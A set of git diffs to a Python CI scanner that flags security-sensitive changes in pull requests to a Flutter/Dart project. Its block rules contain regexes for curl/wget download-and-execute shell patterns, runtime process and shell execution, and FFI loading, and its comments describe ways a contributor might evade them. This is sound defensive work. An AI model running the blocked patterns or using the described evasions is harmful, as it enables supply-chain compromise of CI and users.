+    (re.compile(r"^lib/.*(?:auth|credential|token|session|secure|secret)", re.I), "authentication / credential handling"),
+    (re.compile(r"^lib/.*(?:network|http|client|socket|provider|source)", re.I), "network / provider boundary"),
+    (re.compile(r"^lib/.*(?:database|repository|store|storage|persistence|cache)", re.I), "persistent storage"),
+)
+
+SENSITIVE_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
+    (re.compile(r"\b(?:HttpClient|WebSocket|Socket)\b|package:http/|\bhttp\.(?:get|post|put|delete|patch)\b"), "new network-capable code"),
+    (re.compile(r"\b(?:SharedPreferences|FlutterSecureStorage|File|Directory|RandomAccessFile)\s*\("), "new local persistence / filesystem access"),
+    (re.compile(r"\b(?:writeAsString|writeAsBytes|openWrite|setString|setStringList)\s*\("), "new write-to-disk behavior"),
+    (re.compile(r"\b(?:MethodChannel|EventChannel)\s*\("), "new platform channel"),
+    (re.compile(r"\b(?:authorization|bearer|access[_-]?token|api[_-]?key|password|credential)\b", re.I), "credential-sensitive logic"),
+    (re.compile(r"\b(?:schemaVersion|MigrationStrategy|createIndex|alterTable)\b"), "database schema / migration"),
+)
+
+BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
+    (re.compile(r"\bProcess\.(?:run|runSync|start|startSync)\s*\("), "runtime process execution"),
+    (re.compile(r"\brunInShell\s*:\s*true\b"), "runtime shell execution"),
+    (re.compile(r"(?:import\s+['\"]dart:ffi['\"]|\bDynamicLibrary\.open\s*\()"), "runtime FFI / dynamic library loading"),
+    (re.compile(r"\bpull_request_target\s*:"), "pull_request_target workflow trigger"),
+    (re.compile(r"\bpermissions\s*:\s*write-all\b"), "GitHub Actions write-all permissions"),
+    (re.compile(r"(?:curl|wget)[^\n|]*\|\s*(?:sh|bash)\b|\bbash\s+<\(\s*curl\b|\beval\s+.*\$\(\s*(?:curl|wget)\b"), "download-and-execute shell pattern"),
+)
+
+
+def run_git(*args: str) -> str:
+    result = subprocess.run(
+        ["git", *args],
+        check=True,
+        text=True,
+        stdout=subprocess.PIPE,
+        stderr=subprocess.PIPE,
+    )
+    return result.stdout
+
+
+def changed_files(base: str, head: str) -> list[str]:
+    output = run_git("diff", "--name-only", f"{base}...{head}", "--")
+    return [line for line in output.splitlines() if line]
+
+
+def added_lines(base: str, head: str) -> list[tuple[str, str]]:
+    diff = run_git("diff", "--unified=0", "--no-ext-diff", f"{base}...{head}", "--")
+    current_path = ""
+    additions: list[tuple[str, str]] = []
+    for line in diff.splitlines():
+        if line.startswith("+++ b/"):
+            current_path = line[6:]
+            continue
+        if line.startswith("+") and not line.startswith("+++") and current_path:
+            additions.append((current_path, line[1:]))
+    return additions
+
+
+def dedupe(findings: list[Finding]) -> list[Finding]:
+    seen: set[tuple[str, str]] = set()
+    result: list[Finding] = []
+    for finding in findings:
+        key = (finding.path, finding.reason)
+        if key not in seen:
+            seen.add(key)
+            result.append(finding)
+    return result
+
+
+def main() -> int:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--base", required=True)
+    parser.add_argument("--head", required=True)
+    parser.add_argument("--report", required=True)
+    parser.add_argument("--github-output")
+    args = parser.parse_args()
+
+    files = changed_files(args.base, args.head)
+    additions = added_lines(args.base, args.head)
+
+    sensitive: list[Finding] = []
+    blocked: list[Finding] = []
+
+    for path in files:
+        for pattern, reason in SENSITIVE_PATH_RULES:
+            if pattern.search(path):
+                sensitive.append(Finding(path, reason))
+
+    for path, line in additions:
+        for pattern, reason in SENSITIVE_ADDITION_RULES:
+            if pattern.search(line):
+                sensitive.append(Finding(path, reason))
+        for pattern, reason in BLOCKED_ADDITION_RULES:
+            if pattern.search(line):
+                blocked.append(Finding(path, reason))
+
+    sensitive = dedupe(sensitive)
+    blocked = dedupe(blocked)
+
+    report_path = Path(args.report)
+    report_path.parent.mkdir(parents=True, exist_ok=True)
+    with report_path.open("w", encoding="utf-8") as report:
+        report.write("## PR security surface scan\n\n")
+        report.write(f"Changed files: **{len(files)}**\n\n")
+        if blocked:
+            report.write("### Blocked high-risk additions\n\n")
+            for finding in blocked:
+                report.write(f"- `{finding.path}` — {finding.reason}\n")
+            report.write("\nThese patterns require redesign or a separate maintainer-controlled implementation; an approval does not bypass them.\n\n")
+        if sensitive:
+            report.write("### Sensitive surfaces requiring maintainer review\n\n")
+            for finding in sensitive:
+                report.write(f"- `{finding.path}` — {finding.reason}\n")
+        else:
+            report.write("No security-sensitive trust boundary was detected in this diff.\n")
+
+    if args.github_output:
+        with open(args.github_output, "a", encoding="utf-8") as output:
+            output.write(f"sensitive={'true' if sensitive else 'false'}\n")
+            output.write(f"blocked={'true' if blocked else 'false'}\n")
+
+    if blocked:
+        print("PR security scan blocked high-risk additions:")
+        for finding in blocked:
+            print(f"  {finding.path}: {finding.reason}")
+        return 1
+
+    if sensitive:
+        print("Security-sensitive PR surface detected; maintainer review required.")
+    else:
+        print("PR security surface scan passed: ordinary-risk diff.")
+    return 0
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -13,6 +13,7 @@ it exits non-zero rather than reporting an ordinary-risk diff.
 from __future__ import annotations
 
 import argparse
+import bisect
 import re
 import subprocess
 import sys
@@ -117,7 +118,9 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     ),
     (
         re.compile(
-            r"(?:curl|wget)[^\n|]*\|\s*(?:sudo\s+)?(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
+            # `(?:[^\n|]|\\\n)` lets a backslash continuation cross a line;
+            # `\n?` after the pipe covers a pipe left at end of line.
+            r"(?:curl|wget)(?:[^\n|]|\\\n)*\|[ \t]*\n?[ \t]*(?:sudo\s+)?(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
             r"|\b(?:sh|bash|zsh)\s+<\(\s*(?:curl|wget)\b"
             r"|\b(?:sh|bash|zsh)\s+-c\s+['\"]?\$\(\s*(?:curl|wget)\b"
             r"|\beval\s+.*\$\(\s*(?:curl|wget)\b"
@@ -131,11 +134,13 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
         re.compile(
             r"(?:curl|wget)[^\n]*?"
             r"(?:\s-o\s+|\s--output[= ]|\s-O\s+|\s*>\s*)"
-            r"(?P<target>['\"]?[^\s'\";&|<>]+['\"]?)"
+            # Quotes live outside the capture so `-o /tmp/i` and `sh "/tmp/i"`
+            # compare equal.
+            r"['\"]?(?P<target>[^\s'\";&|<>]+)['\"]?"
             r"[\s\S]{0,2000}?"
             r"(?:[\s;&|(](?:sudo\s+)?(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\s+"
             r"|[\s;&|(]chmod\s+\+x\s+)"
-            r"(?P=target)"
+            r"['\"]?(?P=target)\b"
         ),
         "download-then-execute shell pattern",
     ),
@@ -264,7 +269,26 @@ def _header_path(rest: str) -> str | None:
     return None
 
 
-def added_lines(base: str, head: str) -> list[tuple[str, str]]:
+@dataclass(frozen=True)
+class ChangedSource:
+    """A changed file's post-change text plus the lines this PR added to it."""
+
+    path: str
+    text: str
+    added_lines: frozenset[int]
+
+
+_HUNK = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,(\d+))? @@")
+
+
+def added_line_numbers(base: str, head: str) -> dict[str, set[int]]:
+    """Map each changed path to the 1-based line numbers it gained.
+
+    Only hunk headers are read. The added text itself is taken from the file's
+    post-change blob instead, which is why `--text` matters here: without it a
+    `.gitattributes` `-diff` entry would suppress the hunk headers too.
+    """
+
     diff = run_git(
         *GIT_CONFIG_FLAGS,
         "diff",
@@ -274,68 +298,95 @@ def added_lines(base: str, head: str) -> list[tuple[str, str]]:
         "--",
     )
 
+    added: dict[str, set[int]] = {}
     current_path: str | None = None
-    in_hunk = False
-    additions: list[tuple[str, str]] = []
+    seen_header = False
 
-    # Split on "\n" only. `str.splitlines()` also breaks on \x0b, \x0c and
-    # \u2028, which Dart accepts as whitespace *inside* an expression, so a
-    # contributor could otherwise split a blocked pattern across two "lines"
-    # that neither half matches.
     for line in diff.split("\n"):
         if line.startswith("diff --git "):
             current_path = None
-            in_hunk = False
+            seen_header = False
             continue
-        if line.startswith("@@"):
-            # Everything after the first hunk header belongs to file content,
-            # so an added line that itself begins with "++ " is never mistaken
-            # for a `+++ ` file header.
-            in_hunk = True
+        if line.startswith("+++ ") and not seen_header:
+            current_path = _header_path(line[4:])
+            seen_header = True
             continue
-        if not in_hunk:
-            if line.startswith("+++ "):
-                current_path = _header_path(line[4:])
+        match = _HUNK.match(line)
+        if not match:
             continue
-        if line.startswith("+"):
-            additions.append((current_path or UNKNOWN_PATH, line[1:]))
+        seen_header = True
+        start = int(match.group(1))
+        count = 1 if match.group(2) is None else int(match.group(2))
+        if count == 0:
+            continue
+        path = current_path or UNKNOWN_PATH
+        added.setdefault(path, set()).update(range(start, start + count))
 
-    return additions
+    return added
 
 
-_SHELL_LINE_CONTINUATION = re.compile(r"\\\n[ \t]*")
-_SHELL_PIPE_CONTINUATION = re.compile(r"\|[ \t]*\n[ \t]*")
+def file_text(head: str, path: str) -> str | None:
+    """Post-change content of `path`, or None if the PR deleted it.
 
-
-def fold_continuations(text: str) -> str:
-    """Rejoin shell line continuations inside a block of added lines.
-
-    A trailing backslash, or a trailing pipe, carries one shell command onto the
-    next line. The download-and-execute rule deliberately refuses to match
-    across a newline — otherwise an unrelated interpreter invocation far below a
-    download would trip it — so a genuine continuation has to be folded away
-    before that rule runs.
+    Read as a blob rather than out of the diff: blob output is not affected by
+    any `.gitattributes` the PR ships, and it carries the untouched context that
+    a blocked construct may have been completed from.
     """
 
-    text = _SHELL_LINE_CONTINUATION.sub(" ", text)
-    return _SHELL_PIPE_CONTINUATION.sub("| ", text)
+    try:
+        return run_git(*GIT_CONFIG_FLAGS, "show", f"{head}:{path}")
+    except ScannerError:
+        return None
 
 
-def group_additions(additions: list[tuple[str, str]]) -> list[tuple[str, str]]:
-    """Collapse a file's added lines into one block of text to scan.
+def changed_sources(base: str, head: str) -> tuple[list[ChangedSource], bool]:
+    """Post-change text for every file this PR added lines to.
 
-    Rules are applied to the block rather than to each line on its own, because
-    the constructs they describe do not have to sit on one physical line. Dart
-    accepts a newline anywhere between tokens, so `Process` and `.run(...)` can
-    be split across two added lines — and, with `--unified=0`, across two hunks
-    with an untouched blank line or comment between them. Joining every added
-    line of a file leaves nowhere for a blocked construct to hide.
+    Returns the sources and whether any hunk could not be attributed to a path.
     """
 
-    blocks: dict[str, list[str]] = {}
-    for path, line in additions:
-        blocks.setdefault(path, []).append(line)
-    return [(path, fold_continuations("\n".join(lines))) for path, lines in blocks.items()]
+    sources: list[ChangedSource] = []
+    unresolved = False
+
+    for path, lines in added_line_numbers(base, head).items():
+        if path == UNKNOWN_PATH:
+            unresolved = True
+            continue
+        text = file_text(head, path)
+        if text is None:
+            # Added lines but no blob at head: the path was renamed away or
+            # removed by a later commit in the range. Nothing left to scan.
+            continue
+        sources.append(ChangedSource(path, text, frozenset(lines)))
+
+    return sources, unresolved
+
+
+def _line_index(text: str) -> list[int]:
+    """Offset at which each 1-based line starts."""
+
+    offsets = [0]
+    for index, char in enumerate(text):
+        if char == "\n":
+            offsets.append(index + 1)
+    return offsets
+
+
+def touches_added_lines(
+    offsets: list[int], added: frozenset[int], start: int, end: int
+) -> bool:
+    """Does a match spanning [start, end) overlap a line this PR added?
+
+    This is what lets the scanner read whole post-change files without
+    punishing code the PR never touched: a construct already present in an
+    untouched region matches, but does not count. It also catches the reverse
+    case, where a PR completes a blocked construct out of existing tokens — the
+    match then spans the added fragment and is reported.
+    """
+
+    first = bisect.bisect_right(offsets, start)
+    last = bisect.bisect_right(offsets, max(start, end - 1))
+    return any(line in added for line in range(first, last + 1))
 
 
 def dedupe(findings: list[Finding]) -> list[Finding]:
@@ -349,7 +400,11 @@ def dedupe(findings: list[Finding]) -> list[Finding]:
     return result
 
 
-def classify(files: list[str], additions: list[tuple[str, str]]) -> tuple[list[Finding], list[Finding]]:
+def classify(
+    files: list[str],
+    sources: list[ChangedSource],
+    unresolved_paths: bool = False,
+) -> tuple[list[Finding], list[Finding]]:
     sensitive: list[Finding] = []
     blocked: list[Finding] = []
 
@@ -358,17 +413,24 @@ def classify(files: list[str], additions: list[tuple[str, str]]) -> tuple[list[F
             if pattern.search(path):
                 sensitive.append(Finding(path, reason))
 
-    for path, block in group_additions(additions):
-        if path == UNKNOWN_PATH:
-            sensitive.append(
-                Finding(UNKNOWN_PATH, "diff header could not be decoded; review manually")
-            )
-        for pattern, reason in SENSITIVE_ADDITION_RULES:
-            if pattern.search(block):
-                sensitive.append(Finding(path, reason))
-        for pattern, reason in BLOCKED_ADDITION_RULES:
-            if pattern.search(block):
-                blocked.append(Finding(path, reason))
+    if unresolved_paths:
+        sensitive.append(
+            Finding(UNKNOWN_PATH, "diff header could not be decoded; review manually")
+        )
+
+    for source in sources:
+        offsets = _line_index(source.text)
+        for rules, sink in (
+            (SENSITIVE_ADDITION_RULES, sensitive),
+            (BLOCKED_ADDITION_RULES, blocked),
+        ):
+            for pattern, reason in rules:
+                for match in pattern.finditer(source.text):
+                    if touches_added_lines(
+                        offsets, source.added_lines, match.start(), match.end()
+                    ):
+                        sink.append(Finding(source.path, reason))
+                        break
 
     return dedupe(sensitive), dedupe(blocked)
 
@@ -401,12 +463,12 @@ def main(argv: list[str] | None = None) -> int:
 
     try:
         files = changed_files(args.base, args.head)
-        additions = added_lines(args.base, args.head)
+        sources, unresolved_paths = changed_sources(args.base, args.head)
     except ScannerError as error:
         print(f"::error::PR security surface scan could not inspect the diff: {error}", file=sys.stderr)
         return 2
 
-    sensitive, blocked = classify(files, additions)
+    sensitive, blocked = classify(files, sources, unresolved_paths)
 
     write_report(Path(args.report), files, sensitive, blocked)
 

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -264,12 +264,18 @@ def changed_files(base: str, head: str) -> list[str]:
     return [path for path in output.split("\0") if path]
 
 
+# Destination of a `+++ /dev/null` header: the file is gone at head. Distinct
+# from None, which means the header could not be parsed at all — one is an
+# ordinary deletion, the other is a reason to stop and ask for a human.
+DELETED = "\0deleted"
+
+
 def _header_path(rest: str) -> str | None:
     """Resolve the destination path from a `+++ ` diff header."""
 
     path = unquote_git_path(rest.strip())
     if path == "/dev/null":
-        return None
+        return DELETED
     if path.startswith("b/"):
         return path[2:]
     return None
@@ -282,14 +288,13 @@ class ChangedSource:
     path: str
     text: str
     added_lines: frozenset[int]
-    has_deletions: bool
 
 
 _HUNK = re.compile(r"^@@ -\d+(?:,(\d+))? \+(\d+)(?:,(\d+))? @@")
 
 
-def added_line_numbers(base: str, head: str) -> dict[str, tuple[set[int], bool]]:
-    """Map each changed path to the lines it gained and whether it lost any.
+def added_line_numbers(base: str, head: str) -> dict[str, set[int]]:
+    """Map each path still present at head to the 1-based lines it gained.
 
     Only hunk headers are read. The added text itself is taken from the file's
     post-change blob instead, which is why `--text` matters here: without it a
@@ -305,7 +310,7 @@ def added_line_numbers(base: str, head: str) -> dict[str, tuple[set[int], bool]]
         "--",
     )
 
-    added: dict[str, tuple[set[int], bool]] = {}
+    added: dict[str, set[int]] = {}
     current_path: str | None = None
     seen_header = False
 
@@ -326,17 +331,15 @@ def added_line_numbers(base: str, head: str) -> dict[str, tuple[set[int], bool]]
         start = int(match.group(2))
         count = 1 if match.group(3) is None else int(match.group(3))
 
+        if current_path == DELETED:
+            # The whole file is gone at head. There is no post-change content to
+            # scan, and changed_files() still classifies the path it had.
+            continue
+
         path = current_path or UNKNOWN_PATH
-        lines, deletions = added.setdefault(path, (set(), False))
-        # A net loss of lines is what can activate code the PR never retyped:
-        # dropping a `/*` or an `if (false)` wrapper leaves the guarded call
-        # untouched but live. A one-for-one edit is not that — its new text is
-        # an added line and gets scanned as one.
-        if removed > count:
-            deletions = True
+        lines = added.setdefault(path, set())
         if count:
             lines.update(range(start, start + count))
-        added[path] = (lines, deletions)
 
     return added
 
@@ -364,11 +367,9 @@ def changed_sources(base: str, head: str) -> tuple[list[ChangedSource], bool]:
     sources: list[ChangedSource] = []
     unresolved = False
 
-    for path, (lines, deletions) in added_line_numbers(base, head).items():
+    for path, lines in added_line_numbers(base, head).items():
         if path == UNKNOWN_PATH:
             unresolved = True
-            continue
-        if not lines and not deletions:
             continue
         text = file_text(head, path)
         if text is None:
@@ -378,7 +379,7 @@ def changed_sources(base: str, head: str) -> tuple[list[ChangedSource], bool]:
             raise ScannerError(
                 f"{path!r} changed but has no readable content at {head}"
             )
-        sources.append(ChangedSource(path, text, frozenset(lines), deletions))
+        sources.append(ChangedSource(path, text, frozenset(lines)))
 
     return sources, unresolved
 
@@ -455,18 +456,20 @@ def classify(
                         break
                     elsewhere = True
                 else:
-                    # The construct is in the file but on lines this PR left
-                    # alone. Normally that is grandfathered code and no concern.
-                    # It stops being grandfathered when the PR removes lines:
-                    # deleting a comment opener or a disabled branch can make an
-                    # untouched call live without ever retyping it. Deciding
-                    # that from a regex would need a real Dart parser, so this
-                    # asks for a maintainer rather than guessing.
-                    if elsewhere and source.has_deletions and sink is blocked:
+                    # The construct is in the file, but on lines this PR left
+                    # alone. That is usually grandfathered code and no concern —
+                    # except that a change elsewhere in the file can make it
+                    # live without retyping it. Deleting a comment opener does
+                    # that; so does flipping `if (false)` to `if (true)`, which
+                    # loses no lines at all. Rather than trying to enumerate the
+                    # ways (a regex cannot decide reachability), any change to a
+                    # file that still holds a blocked construct asks for a
+                    # maintainer. Eight files in this repository qualify.
+                    if elsewhere and sink is blocked:
                         sensitive.append(
                             Finding(
                                 source.path,
-                                f"deletion may activate existing {reason}",
+                                f"change to a file containing existing {reason}",
                             )
                         )
 

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -48,7 +48,14 @@ SENSITIVE_PATH_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     # pin is unreviewed without this.
     (re.compile(r"(?:^|/)gradle/wrapper/"), "build toolchain distribution / wrapper"),
     (re.compile(r"^\.[a-z0-9]+-version$"), "build toolchain pin"),
-    (re.compile(r"^linux/.*(CMakeLists\.txt|\.cc|\.cpp|\.c|\.h|\.hpp)$"), "native Linux code / build configuration"),
+    # linux/ is the desktop runner; native/ holds the C++ DSP library and the
+    # Rust core, both compiled by CI and the Rust one also executed by it
+    # (`cargo run --locked` in rust-core.yml).
+    (re.compile(r"^(?:linux|native)/.*\.(?:cc|cpp|cxx|c|h|hpp|hxx|rs|cmake)$"), "native code"),
+    (re.compile(r"(?:^|/)CMakeLists\.txt$"), "native build configuration"),
+    # A Cargo dependency may carry a build script, which runs at build time on
+    # the CI machine — the same trust boundary pubspec.yaml crosses.
+    (re.compile(r"(?:^|/)Cargo\.(?:toml|lock)$"), "dependency manifest / lockfile"),
     (re.compile(r"^lib/.*(?:auth|credential|token|session|secure|secret)", re.I), "authentication / credential handling"),
     (re.compile(r"^lib/.*(?:network|http|client|socket|provider|source)", re.I), "network / provider boundary"),
     (re.compile(r"^lib/.*(?:database|repository|store|storage|persistence|cache)", re.I), "persistent storage"),

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -50,6 +50,12 @@ SENSITIVE_PATH_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     # config decides HTTPS trust anchors and cleartext, and the backup and
     # data-extraction rules decide what app data leaves the device.
     (re.compile(r"^android/.*/res/xml/"), "Android security / privacy policy"),
+    # Kotlin/Java under android/ implements the platform channels, the SAF
+    # scanner, sharing and the artwork FileProvider, and is compiled into every
+    # release APK by android-release-build.yml. The other trees do not exist
+    # today; naming them keeps a future `flutter create --platforms=` from
+    # landing unclassified privileged code.
+    (re.compile(r"^(?:android|ios|macos|windows)/.*\.(?:kt|java|swift|m|mm)$"), "platform / native app code"),
     (re.compile(r"(?:^|/)gradle/wrapper/"), "build toolchain distribution / wrapper"),
     (re.compile(r"^\.[a-z0-9]+-version$"), "build toolchain pin"),
     # linux/ is the desktop runner; native/ holds the C++ DSP library and the
@@ -105,6 +111,12 @@ def _split_literal(*fragments: str) -> str:
 # string would make the stripper swallow the real code that follows it. Widening
 # the gap between two tokens cannot hide anything, because the separator only
 # ever matches whitespace and comments — never code.
+# Shell whitespace, including a backslash continuation. A command may be broken
+# across lines at any point where a space is legal, so every gap in the download
+# rules has to accept one — the flag, its value and the interpreter's argument
+# alike, not just the first of them.
+_SH_GAP = r"(?:[ \t]|\\\n)"
+
 _SEP = r"(?:\s|(?s:/\*.*?\*/)|//[^\n]*)*"
 
 _FFI = _split_literal("f", "fi")
@@ -162,20 +174,23 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
         # keeps this precise: fetching a data file and separately running an
         # unrelated local script does not match.
         re.compile(
-            r"(?:curl|wget)[^\n]*?"
+            rf"(?:curl|wget)(?:[^\n]|\\\n)*?"
             # Short options bundle and may carry the value attached:
-            # `-o f`, `-o f`, `-qO f`, `-sLo f`, `-of`. Long forms cover curl's
+            # `-o f`, `-qO f`, `-sLo f`, `-of`. Long forms cover curl's
             # --output and wget's --output-document.
-            r"(?:\s-[A-Za-z]*[oO]\s*|\s--output(?:-document)?[=\s]\s*|\s*>\s*)"
+            rf"(?:{_SH_GAP}+-[A-Za-z]*[oO]{_SH_GAP}*"
+            rf"|{_SH_GAP}+--output(?:-document)?(?:=|{_SH_GAP}){_SH_GAP}*"
+            rf"|{_SH_GAP}*>{_SH_GAP}*)"
             # Quotes live outside the capture so `-o /tmp/i` and `sh "/tmp/i"`
             # compare equal.
-            r"['\"]?(?P<target>[^\s'\";&|<>]+)['\"]?"
-            r"[\s\S]{0,2000}?"
-            r"(?:[\s;&|(](?:sudo\s+)?(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\s+"
-            r"|[\s;&|(]chmod\s+\+x\s+)"
+            rf"['\"]?(?P<target>[^\s'\";&|<>]+)['\"]?"
+            rf"[\s\S]{{0,2000}}?"
+            rf"(?:[\s;&|(](?:sudo{_SH_GAP}+)?(?:/\S+/)?"
+            rf"(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node){_SH_GAP}+"
+            rf"|[\s;&|(]chmod{_SH_GAP}+\+x{_SH_GAP}+)"
             # An argument boundary, not \b: `/tmp/data` must not match inside
             # `/tmp/data-cleanup.sh`, which is a different file.
-            r"['\"]?(?P=target)(?=$|[\s'\";&|)<>])"
+            rf"['\"]?(?P=target)(?=$|[\s'\";&|)<>])"
         ),
         "download-then-execute shell pattern",
     ),

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -82,6 +82,12 @@ SENSITIVE_PATH_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     (re.compile(r"(?:^|/)analysis_options\.ya?ml$"), "static analysis configuration"),
     (re.compile(r"(?:^|/)(?:LICENSE|COPYING|NOTICE)(?:$|\.)"), "licensing"),
     (re.compile(r"(?:^|/)key\.properties$|\.(?:jks|keystore)$"), "release signing material"),
+    # metadata/*.yml is the F-Droid build recipe: its Builds entries carry
+    # sudo/prebuild/build commands, and docs/fdroid-submission.md has the
+    # maintainer copy it into fdroiddata and run a full build from it. The
+    # fastlane changelog and description text beside it really is just text,
+    # and stays ordinary.
+    (re.compile(r"^metadata/.*\.ya?ml$"), "F-Droid build recipe"),
     (re.compile(r"^lib/.*(?:auth|credential|token|session|secure|secret)", re.I), "authentication / credential handling"),
     (re.compile(r"^lib/.*(?:network|http|client|socket|provider|source)", re.I), "network / provider boundary"),
     (re.compile(r"^lib/.*(?:database|repository|store|storage|persistence|cache)", re.I), "persistent storage"),
@@ -609,6 +615,7 @@ def classify(
 
     for source in sources:
         offsets = _line_index(source.text)
+        is_prose = bool(_PROSE_PATH.search(source.path))
         for rules, sink in (
             (SENSITIVE_ADDITION_RULES, sensitive),
             (BLOCKED_ADDITION_RULES, blocked),
@@ -617,12 +624,24 @@ def classify(
                 skip = ADDITION_RULE_SKIP_PATHS.get(reason)
                 if skip is not None and skip.search(source.path):
                     continue
+
+                # A capability rule matching a documentation or plain-text file
+                # has found the name of a capability, not the capability: a page
+                # explaining which APIs are forbidden necessarily writes them
+                # down. Downgrade rather than drop, because a README telling a
+                # reader to pipe a download into a shell is still worth an
+                # owner's eyes — it just must not be an unclearable block.
+                if rules is BLOCKED_ADDITION_RULES and is_prose:
+                    hit_sink, hit_reason = sensitive, f"textual reference to {reason}"
+                else:
+                    hit_sink, hit_reason = sink, reason
+
                 elsewhere = False
                 for match in pattern.finditer(source.text):
                     if touches_added_lines(
                         offsets, source.added_lines, match.start(), match.end()
                     ):
-                        sink.append(Finding(source.path, reason))
+                        hit_sink.append(Finding(source.path, hit_reason))
                         break
                     elsewhere = True
                 else:
@@ -637,13 +656,13 @@ def classify(
                     # maintainer. Eight files in this repository qualify.
                     if not elsewhere:
                         continue
-                    if sink is blocked:
+                    if hit_sink is blocked:
                         # Only eight files in the repository hold one of these,
                         # so any change to one can afford to ask.
                         sensitive.append(
                             Finding(
                                 source.path,
-                                f"change to a file containing existing {reason}",
+                                f"change to a file containing existing {hit_reason}",
                             )
                         )
                     elif source.suppression_removed:
@@ -658,7 +677,7 @@ def classify(
                         sensitive.append(
                             Finding(
                                 source.path,
-                                f"removed suppression may activate existing {reason}",
+                                f"removed suppression may activate existing {hit_reason}",
                             )
                         )
 

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -107,6 +107,7 @@ SENSITIVE_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     (re.compile(r"\b(?:schemaVersion|MigrationStrategy|createIndex|alterTable)\b"), "database schema / migration"),
 )
 
+
 def _split_literal(*fragments: str) -> str:
     """Join the fragments of a literal this file must not contain contiguously.
 
@@ -170,6 +171,13 @@ _SAME_TARGET = r"""['\"]?(?P=target)(?=$|[\s'\";&|)<>])"""
 
 _SH_GAP = r"(?:[ \t]|\\\n)"
 
+# One shell argument/fragment that may contain separators only while quoted.
+# This keeps `curl 'https://x?a=1&b=2' | sh` detectable while ensuring an
+# unquoted `;` or `&` ends the curl/wget command instead of letting a later,
+# unrelated pipeline become a false hard block.
+_SHELL_QUOTED = r"""(?:'(?:[^']*)'|"(?:\\.|[^"\\])*")"""
+_SHELL_COMMAND_SEGMENT = rf"(?:{_SHELL_QUOTED}|\\\n|[^\n|;&])*"
+
 _SEP = r"(?:\s|(?s:/\*.*?\*/)|//[^\n]*)*"
 
 _FFI = _split_literal("f", "fi")
@@ -194,10 +202,13 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
         #
         # `false` also has to be the entire value. `false || true` and
         # `false == false` both start with it and both evaluate true, so the
-        # exemption ends at a value delimiter.
+        # exemption ends at a value delimiter. Comments are valid whitespace in
+        # Dart, so an explicit false followed only by comments and a delimiter
+        # remains exempt without making expressions that merely start with false
+        # exempt as well.
         re.compile(
             rf"""\b{_split_literal("runIn", "Shell")}['"]?\s*:"""
-            r"""(?!\s*false\s*(?:[,);}\]\n]|$))"""
+            rf"""(?!\s*false{_SEP}(?:[,);}}\]\n]|$))"""
         ),
         "runtime shell execution",
     ),
@@ -220,13 +231,12 @@ BLOCKED_ADDITION_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
     ),
     (
         re.compile(
-            # `(?:[^\n|]|\\\n)` lets a backslash continuation cross a line;
-            # `\n?` after the pipe covers a pipe left at end of line. The
-            # `(?:\|[^|\n;&]*)*` run allows intermediate stages — `| tee f | sh`
-            # pipes the same downloaded stream into the interpreter — while
-            # refusing to cross `;` or `&`, which would end the pipeline and
-            # make a later `| sh` a different command.
-            r"(?:curl|wget)(?:[^\n|]|\\\n)*(?:(?<!\|)\|(?!\|)[^|\n;&]*)*"
+            # Quoted arguments may legitimately contain `;`, `&`, or `|`; an
+            # unquoted separator ends the download command. Intermediate pipe
+            # stages use the same quote-aware segment so `| sed 's;a;b;' | sh`
+            # stays detectable without crossing into a later unrelated command.
+            rf"(?:curl|wget){_SHELL_COMMAND_SEGMENT}"
+            rf"(?:(?<!\|)\|(?!\|){_SHELL_COMMAND_SEGMENT})*"
             rf"(?<!\|)\|(?!\|)[ \t]*\n?[ \t]*"
             rf"{_EXEC_WRAPPER}(?:/\S+/)?(?:sh|bash|zsh|dash|ksh|python3?|perl|ruby|node)\b"
             r"|\b(?:sh|bash|zsh)\s+<\(\s*(?:curl|wget)\b"

--- a/scripts/check_pr_security_surface.py
+++ b/scripts/check_pr_security_surface.py
@@ -4,14 +4,18 @@
 This is intentionally conservative: ordinary UI/tests/docs PRs should pass
 without maintainer involvement, while changes that touch trust boundaries are
 surfaced for an explicit second review.
+
+Every ambiguity is resolved in the fail-closed direction. If git metadata is
+missing, if a diff header cannot be parsed, or if the scanner cannot complete,
+it exits non-zero rather than reporting an ordinary-risk diff.
 """
 
 from __future__ import annotations
 
 import argparse
-import os
 import re
 import subprocess
+import sys
 from dataclasses import dataclass
 from pathlib import Path
 
@@ -20,6 +24,12 @@ from pathlib import Path
 class Finding:
     path: str
     reason: str
+
+
+# Attributed to added lines whose file header could not be decoded. Scanning
+# still happens; the unresolved path itself is reported as sensitive so that a
+# parser failure can never downgrade a diff to "ordinary risk".
+UNKNOWN_PATH = "<unresolved diff path>"
 
 
 SENSITIVE_PATH_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
@@ -31,6 +41,11 @@ SENSITIVE_PATH_RULES: tuple[tuple[re.Pattern[str], str], ...] = (
